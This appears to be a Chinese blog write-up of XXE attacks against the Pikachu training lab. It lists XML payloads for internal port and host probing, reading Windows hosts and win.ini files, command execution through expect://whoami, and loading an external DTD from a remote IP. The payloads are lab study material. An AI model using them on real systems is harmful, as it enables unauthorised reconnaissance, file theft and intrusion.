Pikachu | XXE

利用xml注入的回显探测:

复制代码
<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY xxe "test"> ]><root>&xxe;</root>

利用xml注入的端口探测:

payload:

复制代码
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPEroot[<!ENTITY xxe SYSTEM "http://192.168.x.x:8080">]><root>&xxe;</root>

利用burpsuite探测敏感端口:

端口探测的存活列表边界建议手动测试访问,根据响应时间可能不太准确。

对比nmap扫描出来的结果:

利用xml注入的内网主机探测:

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://192.168.x.x" > ]><foo>&xxe;</foo>

同样利用BurpSuite对内网存活主机地址探测。

利用xml注入的敏感文件读取:

hosts读取:

*一般系统敏感文件是默认路径。

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" > ]><foo>&xxe;</foo>

hosts文件是本地DNS配置文件,用户在本地指定域名与IP的映射关系,优先级高于DNS服务器。用来发现内网域名、隐藏的测试系统或管理后台。利用该文件绕过CDN直接访问真实IP。

win.ini读取:

win.ini文件保留了系统配置信息,判断系统类型:存在[fonts]、[boot]等字段即可确认windows。

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" > ]><foo>&xxe;</foo>

利用xml注入的命令执行:

复制代码
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://whoami" > ]><foo>&xxe;</foo>

利用xml注入的远程文件执行:

复制代码
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root SYSTEM "http://192.168.10.17:8086/evil.dtd"><root>&xxe;</root>

远程dtd payload:

复制代码
<!ENTITY xxe system "file:///C:/Windows/System32/drivers/etc/hosts">

这里没有回显不知道为什么。

相关推荐
山峰哥1 小时前
告别“点点点”:AI 如何重构我们的测试体系与质量防线
服务器·汇编·数据库·人工智能·性能优化·重构
编程大师哥1 小时前
Linux 命名管道(FIFO)通信 超清晰讲解
linux·运维·服务器
Smile_2542204181 小时前
linux服务器清理磁盘
linux·运维·服务器
panamera122 小时前
linux下SPI、IIC、UART、CAN的编码
linux·运维·服务器
一名优秀的码农2 小时前
vulhub系列-55-napping-1.0.1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
returnthem3 小时前
虚拟机sda紧急处理扩容(used100%,无空间剩余,开不了机)
linux·运维·服务器
ZHANG13HAO3 小时前
嵌入式温度记录仪:15 天数据存储与 BLE 无损压缩方案(CH592 最优实现)
大数据·服务器·数据库
Sean‘3 小时前
Linux系统下安装Trivy
linux·运维·服务器
熬夜的咕噜猫3 小时前
MySQL 故障排查与优化
大数据·运维·服务器·mysql
打工人1379号3 小时前
2K3000常见问题合集
linux·运维·服务器